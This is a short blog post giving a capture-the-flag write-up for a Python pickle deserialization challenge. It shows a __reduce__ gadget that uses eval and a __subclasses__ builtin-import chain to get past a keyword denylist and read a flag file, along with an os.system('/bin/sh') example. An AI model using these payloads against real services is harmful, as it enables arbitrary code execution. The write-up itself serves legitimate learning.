Tuesday 19 July 2016

CYSCA2015 Pickle challenge



In the lead up to Cysca 2016 I'm doing some of last year's challenges.

This is a writeup to https://github.com/CySCA/CySCA2015/blob/master/python_exploitation/files/mmmmm_pickles.py
It's pretty simple, the program will run 'pickle.loads(user_input)'
with some restrictions on what you can input.

denylist = ("system","exec","popen","print")

First of all I'd like to make it clear that I'm not a python guru, I just know enough to duct-tape bits together to get the job done

The solution is thus:


class RunBinSh(object):
  def __reduce__(self):
  return (eval, (("{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('sys').stdout.write({}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').read({}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').open('./flag.txt', {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').O_RDWR),10))"),))

d = pickle.dumps(RunBinSh())
print d # so I can copy and paste it
pickle.loads(d) # test that it works






I know that when pickle dumps a thing it runs the thing that you return in the function '__reduce__'

(as I said, I'm no expert on python)



so, with that gadget down pat, I'd really like to have something like



import os
class RunBinSh(object):
  def __reduce__(self):
  return (os.system, ("/bin/sh",))







but that aint going to go down with the 'denylist'

to get around this I run 'eval'

and I eval that giant long thing.



Is there a shorter way of doing this? yes definitely

Do I know how to do it? no

Do I need to know? Not for this challenge!



So, what's the giant eval thing?

Well I tried just using 'import os' but eval didn't like that, so I used a little trick (kinda from the previous challenge) to get the equivilent of 'import os' in eval



'{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')'



I googled around a bit to find that and had to tweak it a little to make it actually work. (chucked it in a for loop to find which value didn't make it crash. 59 was the winner)

Using that I can effectively do

sys.stdout.write(os.read(os.open('./flag.txt', os.O_RDWR), 10))




which will open the flag, read 10 characters and write it to stdout.

adjust to taste for real ctf environment and you're done








































































        

      









Subscribe to:
Posts (Atom)